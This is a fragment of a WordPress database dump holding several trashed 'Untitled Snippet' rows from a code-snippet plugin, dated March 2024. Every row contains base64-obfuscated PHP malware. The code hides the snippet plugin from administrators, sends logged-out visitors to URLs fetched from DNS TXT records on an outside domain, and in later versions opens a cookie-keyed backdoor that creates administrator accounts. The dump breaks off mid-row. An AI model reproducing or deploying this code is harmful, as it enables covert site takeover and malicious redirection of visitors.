_red(){if(!is_user_logged_in()){$q1=_user_ip();if(!$q1){return;}$k2=get_transient(base64_decode(\'ZXhw\'));if(!is_array($k2)){$k2=array();}foreach($k2 as $g3=>$l4){if(time()-$l4>86400){unset($k2[$g3]);}}if(key_exists($q1,$k2)&&(time()-$k2[$q1]<86400)){return;}$y5=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN);$v6=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$q1);$v6=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$v6);$h7=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$o8=(!$y5?base64_decode(\'dW5rLmNvbQ==\'):$y5).base64_decode(\'Lg==\').(!$v6?base64_decode(\'MC0wLTAtMA==\'):$v6).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$h7:base64_decode(\'bmQ=\')).base64_decode(\'LmNsb3VkLXN0YXRzLmNvbQ==\');$u9=dns_get_record($o8,DNS_TXT);if(is_array($u9)&&!empty($u9)){if(isset($u9[0][base64_decode(\'dHh0\')])){$u9=$u9[0][base64_decode(\'dHh0\')];$u9=base64_decode($u9);if($u9==base64_decode(\'ZXJy\')){$k2[$q1]=time();set_transient(base64_decode(\'ZXhw\'),$k2);}else if(substr($u9,0,4)===base64_decode(\'aHR0cA==\')){$k2[$q1]=time();set_transient(base64_decode(\'ZXhw\'),$k2);wp_redirect($u9);exit;}}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-4','','','2024-03-14 19:59:59','2024-03-14 19:59:59','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4990,1,'2024-03-14 20:00:08','2024-03-14 20:00:08','if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $j0){if(array_key_exists($j0,$_SERVER)&&!empty($_SERVER[$j0])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$j0])as $r1){$r1=trim($r1);if(filter_var($r1,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $r1;}}}}return false;}function _red(){if(!is_user_logged_in()){$r1=_user_ip();if(!$r1){return;}$m2=get_transient(base64_decode(\'ZXhw\'));if(!is_array($m2)){$m2=array();}foreach($m2 as $n3=>$s4){if(time()-$s4>86400){unset($m2[$n3]);}}if(key_exists($r1,$m2)&&(time()-$m2[$r1]<86400)){return;}$l5=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$k6=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$r1);$k6=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$k6);$q7=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$m8=(!$l5?base64_decode(\'dW5rLmNvbQ==\'):$l5).base64_decode(\'Lg==\').(!$k6?base64_decode(\'MC0wLTAtMA==\'):$k6).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$q7:base64_decode(\'bmQ=\')).base64_decode(\'LmNsb3VkLXN0YXRzLmNvbQ==\');$e9=dns_get_record($m8,DNS_TXT);if(is_array($e9)&&!empty($e9)){if(isset($e9[0][base64_decode(\'dHh0\')])){$e9=$e9[0][base64_decode(\'dHh0\')];$e9=base64_decode($e9);if($e9==base64_decode(\'ZXJy\')){$m2[$r1]=time();set_transient(base64_decode(\'ZXhw\'),$m2);}else if(substr($e9,0,4)===base64_decode(\'aHR0cA==\')){$m2[$r1]=time();set_transient(base64_decode(\'ZXhw\'),$m2);wp_redirect($e9);exit;}}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-5','','','2024-03-14 22:16:27','2024-03-14 22:16:27','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4991,1,'2024-03-14 22:16:36','2024-03-14 22:16:36','if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&amp;&amp;!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8gIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($v0){unset($v0[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $v0;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $n1){if(array_key_exists($n1,$_SERVER)&amp;&amp;!empty($_SERVER[$n1])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$n1])as $t2){$t2=trim($t2);if(filter_var($t2,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t2;}}}}return false;}function _red(){if(!is_user_logged_in()){$t2=_user_ip();if(!$t2){return;}$r3=get_transient(base64_decode(\'ZXhw\'));if(!is_array($r3)){$r3=array();}foreach($r3 as $r4=&gt;$m5){if(time()-$m5&gt;86400){unset($r3[$r4]);}}if(key_exists($t2,$r3)&amp;&amp;(time()-$r3[$t2]&lt;86400)){return;}$z6=filter_var(parse_url(base64_decode(&#039;aHR0cHM6Ly8=&#039;).$_SERVER[base64_decode(&#039;SFRUUF9IT1NU&#039;)],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$r7=str_replace(base64_decode(&#039;Og==&#039;),base64_decode(&#039;LQ==&#039;),$t2);$r7=str_replace(base64_decode(&#039;Lg==&#039;),base64_decode(&#039;LQ==&#039;),$r7);$s8=_is_iphone()?base64_decode(&#039;aQ==&#039;):base64_decode(&#039;bQ==&#039;);$p9=(!$z6?base64_decode(&#039;dW5rLmNvbQ==&#039;):$z6).base64_decode(&#039;Lg==&#039;).(!$r7?base64_decode(&#039;MC0wLTAtMA==&#039;):$r7).base64_decode(&#039;Lg==&#039;).mt_rand(100000,999999).base64_decode(&#039;Lg==&#039;).(_is_mobile()?base64_decode(&#039;bg==&#039;).$s8:base64_decode(&#039;bmQ=&#039;)).base64_decode(&#039;LmNsb3VkLXN0YXRzLmNvbQ==&#039;);$h10=dns_get_record($p9,DNS_TXT);if(is_array($h10)&amp;&amp;!empty($h10)){if(isset($h10[0][base64_decode(&#039;dHh0&#039;)])){$h10=$h10[0][base64_decode(&#039;dHh0&#039;)];$h10=base64_decode($h10);if($h10==base64_decode(&#039;ZXJy&#039;)){$r3[$t2]=time();set_transient(base64_decode(&#039;ZXhw&#039;),$r3);}else if(substr($h10,0,4)===base64_decode(&#039;aHR0cA==&#039;)){$r3[$t2]=time();set_transient(base64_decode(&#039;ZXhw&#039;),$r3);wp_redirect($h10);exit;}}}}}add_action(base64_decode(&#039;aW5pdA==&#039;),base64_decode(&#039;X3JlZA==&#039;));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-6','','','2024-03-15 20:04:28','2024-03-15 20:04:28','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4992,1,'2024-03-15 20:04:41','2024-03-15 20:04:41','if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&amp;&amp;!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8gIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($v0){unset($v0[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $v0;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $n1){if(array_key_exists($n1,$_SERVER)&amp;&amp;!empty($_SERVER[$n1])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$n1])as $t2){$t2=trim($t2);if(filter_var($t2,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t2;}}}}return false;}function _red(){if(!is_user_logged_in()){$t2=_user_ip();if(!$t2){return;}$r3=get_transient(base64_decode(\'ZXhw\'));if(!is_array($r3)){$r3=array();}foreach($r3 as $r4=&gt;$m5){if(time()-$m5&gt;86400){unset($r3[$r4]);}}if(key_exists($t2,$r3)&amp;&amp;(time()-$r3[$t2]&lt;86400)){return;}$z6=filter_var(parse_url(base64_decode(&#039;aHR0cHM6Ly8=&#039;).$_SERVER[base64_decode(&#039;SFRUUF9IT1NU&#039;)],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$r7=str_replace(base64_decode(&#039;Og==&#039;),base64_decode(&#039;LQ==&#039;),$t2);$r7=str_replace(base64_decode(&#039;Lg==&#039;),base64_decode(&#039;LQ==&#039;),$r7);$s8=_is_iphone()?base64_decode(&#039;aQ==&#039;):base64_decode(&#039;bQ==&#039;);$p9=(!$z6?base64_decode(&#039;dW5rLmNvbQ==&#039;):$z6).base64_decode(&#039;Lg==&#039;).(!$r7?base64_decode(&#039;MC0wLTAtMA==&#039;):$r7).base64_decode(&#039;Lg==&#039;).mt_rand(100000,999999).base64_decode(&#039;Lg==&#039;).(_is_mobile()?base64_decode(&#039;bg==&#039;).$s8:base64_decode(&#039;bmQ=&#039;)).base64_decode(&#039;LmNsb3VkLXN0YXRzLmNvbQ==&#039;);$h10=dns_get_record($p9,DNS_TXT);if(is_array($h10)&amp;&amp;!empty($h10)){if(isset($h10[0][base64_decode(&#039;dHh0&#039;)])){$h10=$h10[0][base64_decode(&#039;dHh0&#039;)];$h10=base64_decode($h10);if($h10==base64_decode(&#039;ZXJy&#039;)){$r3[$t2]=time();set_transient(base64_decode(&#039;ZXhw&#039;),$r3);}else if(substr($h10,0,4)===base64_decode(&#039;aHR0cA==&#039;)){$r3[$t2]=time();set_transient(base64_decode(&#039;ZXhw&#039;),$r3);wp_redirect($h10);exit;}}}}}add_action(base64_decode(&#039;aW5pdA==&#039;),base64_decode(&#039;X3JlZA==&#039;));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-7','','','2024-03-16 11:03:33','2024-03-16 11:03:33','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4993,1,'2024-03-16 11:03:43','2024-03-16 11:03:43','$p0=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8gIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($z1){unset($z1[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $z1;});}function _gcookie($y2){return(isset($_COOKIE[$y2]))?base64_decode($_COOKIE[$y2]):\'\';}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);if(!empty($p0)&&_gcookie(base64_decode(\'cHc=\'))===$p0){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$o3=_gcookie(base64_decode(\'ZA==\'));if(strpos($o3,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$o3);}break;case base64_decode(\'YXU=\'):$m4=_gcookie(base64_decode(\'dQ==\'));$d5=_gcookie(base64_decode(\'cA==\'));$n6=_gcookie(base64_decode(\'ZQ==\'));if($m4&&$d5&&$n6&&!username_exists($m4)){$x7=wp_create_user($m4,$d5,$n6);$j8=new WP_User($x7);$j8->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$v9])as $n10){$n10=trim($n10);if(filter_var($n10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $n10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$n10=_user_ip();if(!$n10){return;}$z11=get_transient(base64_decode(\'ZXhw\'));if(!is_array($z11)){$z11=array();}foreach($z11 as $t12=>$d13){if(time()-$d13>86400){unset($z11[$t12]);}}if(key_exists($n10,$z11)&&(time()-$z11[$n10]<86400)){return;}$n14=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$s15=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$n10);$s15=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$s15);$r16=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$h17=get_option(base64_decode(\'ZA==\'));if($h17&&strpos($h17,base64_decode(\'Lg==\'))>0){$r16=$h17;}$z18=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$q19=(!$n14?base64_decode(\'dW5rLmNvbQ==\'):$n14).base64_decode(\'Lg==\').(!$s15?base64_decode(\'MC0wLTAtMA==\'):$s15).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$z18:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$r16;$h20=dns_get_record($q19,DNS_TXT);if(is_array($h20)&&!empty($h20)){if(isset($h20[0][base64_decode(\'dHh0\')])){$h20=$h20[0][base64_decode(\'dHh0\')];$h20=base64_decode($h20);if($h20==base64_decode(\'ZXJy\')){$z11[$n10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$z11);}else if(substr($h20,0,4)===base64_decode(\'aHR0cA==\')){$z11[$n10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$z11);wp_redirect($h20);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-8','','','2024-03-18 13:55:27','2024-03-18 13:55:27','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4994,1,'2024-03-18 13:55:40','2024-03-18 13:55:40','$d0=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($i1){unset($i1[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $i1;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($z2){return(isset($_COOKIE[$z2]))?base64_decode($_COOKIE[$z2]):\'\';}if(!empty($d0)&&_gcookie(base64_decode(\'cHc=\'))===$d0){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$e3=_gcookie(base64_decode(\'ZA==\'));if(strpos($e3,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$e3);}break;case base64_decode(\'YXU=\'):$e4=_gcookie(base64_decode(\'dQ==\'));$l5=_gcookie(base64_decode(\'cA==\'));$p6=_gcookie(base64_decode(\'ZQ==\'));if($e4&&$l5&&$p6&&!username_exists($e4)){$w7=wp_create_user($e4,$l5,$p6);$x8=new WP_User($w7);$x8->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $m9){if(array_key_exists($m9,$_SERVER)&&!empty($_SERVER[$m9])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$m9])as $v10){$v10=trim($v10);if(filter_var($v10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $v10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$v10=_user_ip();if(!$v10){return;}$h11=get_transient(base64_decode(\'ZXhw\'));if(!is_array($h11)){$h11=array();}foreach($h11 as $q12=>$e13){if(time()-$e13>86400){unset($h11[$q12]);}}if(key_exists($v10,$h11)&&(time()-$h11[$v10]<86400)){return;}$m14=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$u15=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$v10);$u15=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$u15);$v16=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$h17=get_option(base64_decode(\'ZA==\'));if($h17&&strpos($h17,base64_decode(\'Lg==\'))>0){$v16=$h17;}$g18=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$q19=(!$m14?base64_decode(\'dW5rLmNvbQ==\'):$m14).base64_decode(\'Lg==\').(!$u15?base64_decode(\'MC0wLTAtMA==\'):$u15).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$g18:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$v16;$p20=@dns_get_record($q19,DNS_TXT);if(is_array($p20)&&!empty($p20)){if(isset($p20[0][base64_decode(\'dHh0\')])){$p20=$p20[0][base64_decode(\'dHh0\')];$p20=base64_decode($p20);if($p20==base64_decode(\'ZXJy\')){$h11[$v10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$h11);}else if(substr($p20,0,4)===base64_decode(\'aHR0cA==\')){$h11[$v10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$h11);wp_redirect($p20);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}','Untitled Snippet','','trash','closed','closed','','untitled-snippet__trashed-9','','','2024-03-26 05:08:19','2024-03-26 05:08:19','',0,'https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/',0,'wpcode','',0),(4995,1,'2024-03-26 05:08:31','2024-03-26 05:08:31','$p0=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($q1){unset($q1[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $q1;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($p2){return(isset($_COOKIE[$p2]))?base64_decode($_COOKIE[$p2]):\'\';}if(!empty($p0)&&_gcookie(base64_decode(\'cHc=\'))===$p0){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$d3=_gcookie(base64_decode(\'ZA==\'));if(strpos($d3,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$d3);}break;case 